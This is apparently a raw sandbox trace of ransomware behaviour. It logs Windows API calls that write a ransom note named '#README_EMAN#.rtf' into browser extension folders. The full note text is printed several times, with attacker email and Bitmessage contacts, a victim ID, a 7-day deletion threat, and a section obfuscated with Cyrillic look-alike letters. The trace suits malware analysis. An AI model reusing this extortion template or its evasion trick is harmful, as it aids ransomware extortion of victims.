;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.275] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.276] CloseHandle (hObject=0x2c8) returned 1 [0280.276] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0280.276] GetLastError () returned 0x2 [0280.276] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator 